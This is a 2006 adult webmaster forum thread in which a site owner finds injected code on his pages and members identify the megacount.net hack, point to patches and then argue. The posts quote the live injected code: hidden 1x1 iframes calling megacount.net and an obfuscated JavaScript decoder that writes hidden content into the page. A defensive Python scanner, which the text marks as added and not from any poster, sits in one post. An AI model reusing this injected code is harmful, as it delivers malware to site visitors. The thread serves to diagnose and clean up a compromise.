GoFuckYourself.com - Adult Webmaster Forum


biskoppen 10-09-2006 08:41 AM

Our server seems hacked??
 
Just found this HTML in one of our biggest pages .. we didn't place it there

<iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>

Anyone?

cess 10-09-2006 08:43 AM

are you using webair?

SmokeyTheBear 10-09-2006 08:43 AM

yup see many threads on megacount hack

Quickdraw 10-09-2006 08:43 AM

yep, you have been hacked, and have some work ahead of you. Do a search for megacount and you will have plenty to read

Machete_ 10-09-2006 08:44 AM

Yes, it's compromised.
There are a few posts about it here as well. It hit Webair pretty hard including one of our virtual plans

gooddomains 10-09-2006 08:44 AM

you've been hacked

SmokeyTheBear 10-09-2006 08:44 AM

p.s. put "megacount" in google for thread

gooddomains 10-09-2006 08:46 AM

welcome to the club

biskoppen 10-09-2006 08:47 AM

Quote:

Originally Posted by cess (Post 11030745)
are you using webair?

Nope, JupiterHosting

Machete_ 10-09-2006 08:48 AM

http://www.grisoft.com/doc/trial/lng.../tpl01?prd=asw

download the trial and clean up your PC. It installs a trojan and 2 counts of malware

Machete_ 10-09-2006 08:49 AM

BTW. the site in your Sig is infected as well - please remove it before someone clicks it

biskoppen 10-09-2006 08:59 AM

Finding this code on some of our index files as well..

<script language="JavaScript">e = '0x00' + '3D';str1 = "%86%DE%D5%C8%A2%CF%CE%C5%D6%D9%81%9C%C8%D5%CF%D5% DC%D5%D6%D5%CE%C5%84%DA%D5%DE%DE%D9%D0%9C%80%86%D5 %D8%CC%DD%D1%D9%A2%CF%CC%DF%81%9C%DA%CE%CE%D2%84%9 3%93%DF%D6%C8%DF%D0%CE%90%DF%D3%D1%93%CE%CC%D8%93% 9C%A2%CB%D5%DE%CE%DA%81%8D%A2%DA%D9%D5%DB%DA%CE%81 %8D%80%86%93%D5%D8%CC%DD%D1%D9%80%86%93%DE%D5%C8%8 0";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>
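
A defender's check for the two injection patterns reported in this thread (1x1 iframes, and a script that decodes a percent-encoded string into `document.write`), added here as an example and not posted by any participant. The function names, finding labels and the sample page are constructed for illustration.

```python
import os
import re

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
DIM_RE = re.compile(r"\b(width|height)\s*=\s*['\"]?(\d+)", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
ENCODED_RUN_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}){20,}")  # 20+ escaped bytes in a row


def scan_html(text):
    """Return sorted (line_number, finding) pairs for one document."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        dims = {k.lower(): int(v) for k, v in DIM_RE.findall(m.group(0))}
        # Invisible frame: both dimensions given and neither exceeds 1 pixel.
        if len(dims) == 2 and max(dims.values()) <= 1:
            findings.append((text.count("\n", 0, m.start()) + 1, "hidden-iframe"))
    for m in SCRIPT_RE.finditer(text):
        body = re.sub(r"\s+", "", m.group(1))  # undo wrapping inside the blob
        decodes = "unescape(" in body or "fromCharCode(" in body
        if "document.write(" in body and decodes and ENCODED_RUN_RE.search(body):
            findings.append((text.count("\n", 0, m.start()) + 1, "encoded-writer"))
    return sorted(findings)


def scan_tree(root, exts=(".html", ".htm", ".php")):
    """Walk a document root and map each flagged file to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_html(fh.read())
                if hits:
                    report[path] = hits
    return report


# Constructed sample page (placeholder host, harmless encoded string).
SAMPLE = (
    "<html><body>\n"
    "<iframe src='http://tracker.example.invalid/new.php' width=1 height=1></iframe>\n"
    "<iframe src='/player.html' width=640 height=360></iframe>\n"
    "<script>document.write('<b>hello</b>');</script>\n"
    "<script>s=\"" + "%41%42" * 12 + "\";document.write(unescape(s));</script>\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    for line, kind in scan_html(SAMPLE):
        print(line, kind)
```

Both checks are heuristics: a hit marks a file for manual review, and a clean scan does not show the server itself is clean.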

gooddomains 10-09-2006 09:00 AM

start reinstalling your servers, you are distributing trojans

biskoppen 10-09-2006 09:02 AM

Quote:

Originally Posted by gooddomains (Post 11030867)
start reinstalling your servers, you are distributing trojans

Really?? So this is much more than the altered HTML I'm finding?

DateDoc 10-09-2006 09:04 AM

fucking-around-and-business-discussion/662380-hacked-megacount-net.html
fucking-around-and-business-discussion/660506-getting-hacked.html
fucking-around-and-business-discussion/661811-responce-2-getting-hacked.html
fucking-around-and-business-discussion/662468-martina-warren-trojan-site.html

dissipate 10-09-2006 09:05 AM

When the fuck will people start securing their shit *shakes head*

Machete_ 10-09-2006 09:15 AM

Quote:

Originally Posted by dissipate (Post 11030918)
When the fuck will people start securing their shit *shakes head*

you should read up on the topic before making bullshit comments like that. It's among other things a hole in PHP and cPanel. not something you can fix yourself

gooddomains 10-09-2006 09:32 AM

Quote:

Originally Posted by biskoppen (Post 11030885)
Really?? So this is much more than the altered HTML I'm finding?

you are probably webmaster number 25612 that got infected, it's been a security hole now for weeks with patches available, only seems everyone is too lazy to install them

dissipate 10-09-2006 09:35 AM

Quote:

Originally Posted by ebus_dk (Post 11031001)
you should read up on the topic before making bullshit comments like that. It's among other things a hole in PHP and cPanel. not something you can fix yourself

I'm well aware of what this asshat has been doing, they're also VERY easily fixed.

http://www.securiteam.com/unixfocus/6R0030UH5W.html
http://www.securiteam.com/unixfocus/6M00315H5S.html

Takes all of 3 minutes to patch.

Now don't you have postwhores to steal domains from or something?

Machete_ 10-09-2006 09:52 AM

Quote:

Originally Posted by dissipate (Post 11031219)

Now don't you have postwhores to steal domains from or something?


dissipate
Join Date: Nov 2005
Posts: 5,787

.. maybe I should check your domains

dissipate 10-09-2006 09:59 AM

Quote:

Originally Posted by ebus_dk (Post 11031389)
.. maybe I should check your domains

Was that intended to somehow worry me?

dissipate 10-09-2006 10:04 AM

Oct 9 07:36:24 strife sshd[4128]: Failed password for root from 83.73.6.174 port 1408 ssh2

Awww, looks like someone from Denmark is trying to brute force one of my machines.

I wonder who this could be.

Machete_ 10-09-2006 10:30 AM

Quote:

Originally Posted by dissipate (Post 11031483)
Oct 9 07:36:24 strife sshd[4128]: Failed password for root from 83.73.6.174 port 1408 ssh2

Awww, looks like someone from Denmark is trying to brute force one of my machines.

I wonder who this could be.

give me a fucking break. My servers get probed 24/7 from proxies all around the world.. grow the hell up !! All you did was check your logs to see if a Danish host had loaded one of your sig banners. Sorry to tell you that the IP listed is not mine

dissipate 10-09-2006 10:44 AM

Quote:

Originally Posted by ebus_dk (Post 11031695)
give me a fucking break. My servers get probed 24/7 from proxies all around the world.. grow the hell up !! All you did was check your logs to see if a Danish host had loaded one of your sig banners. Sorry to tell you that the IP listed is not mine

One hell of a coincidence then, eh? Danish guy makes comment about looking at my boxes... and I'm getting ssh connections from a Danish IP.

Machete_ 10-09-2006 11:02 AM

Quote:

Originally Posted by dissipate (Post 11031817)
One hell of a coincidence then, eh? Danish guy makes comment about looking at my boxes... and I'm getting ssh connections from a Danish IP.


Dude - I LIVE IN SWEDEN !!!!!!!! My company resides in Denmark, and I'm Danish, but my house is in Sweden. It's public knowledge here on GFY and has been posted a million times over and over again.

I never commented on your boxes. You made a joke regarding buying a boardwhore's domain, and I replied "maybe I should check your domains"

As far as I know you don't use SSH to check for domain expiration - but then again, I'm not as smart as you clearly are.

